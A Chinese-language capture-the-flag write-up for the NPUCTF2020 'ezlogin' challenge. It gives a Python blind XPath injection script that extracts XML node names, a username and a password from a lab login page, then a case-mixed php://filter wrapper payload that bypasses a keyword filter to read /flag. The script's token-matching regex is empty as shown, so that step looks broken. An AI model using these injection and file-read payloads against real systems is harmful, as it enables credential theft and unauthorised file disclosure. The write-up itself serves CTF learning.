[NPUCTF2020]ezlogin

XPATH注入学习
一道xpath注入题，又是陌生的知识，学习一下。
上面文章写得很通俗易懂了，就不多说了 直接上脚本

import time
import requests
import re
import string
import logging



# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
target='http://a6b8c73c-96c1-4e55-9f69-98d870a6fc1e.node3.buuoj.cn/login.php'
s = requests.session()
head ={
     
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "Content-Type": "application/xml"
}
find =re.compile('')
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()'
#根节点
# payload="'or substring(name(/*[1]),{},1)='{}' or '=123{}"
#子节点
# payload="'or substring(name(/root/*[1]), {}, 1)='{}'  or '=3123{}"
#accounts节点
# payload="'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or '=3123{}"
#user节点
payload="'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}'  or '=3123{}"
#跑用户名和密码
payload_username ="'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or '=3123{}"
payload_password ="'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or '=3123{}"
def exp():
    res = ''
    for i in range(1,100):
        flag=0
        for str in str1:
            r = s.post(url=target)
            token = find.findall(r.text)
            # print(token[0])
            r = s.post(url=target, headers=head, data=payload_username.format(i, str, token[0]))
            # print(payload.format(i, str, token[0]))
            # print(r.text)
            if '非法操作!' in r.text:
                flag=1
                res = res + str
                print("now ：{}".format(res))
                break
        if(flag==0):
            break
    print("最终结果： {}".format(res))




if __name__ == "__main__":
    exp()

最后跑出来用户名adm1n,密码cf7414b5bdb2e65ee43083f4ddbc4d9fmd5解密后的密码gtfly123
登录成功后得到一串base64加密的字符

提示flag在/flag
看url

应该是要读文件。
无法直接读，过滤了关键字，最后伪协议大小写绕过
phP://filter/convert.bAse64-encode/resource=/flag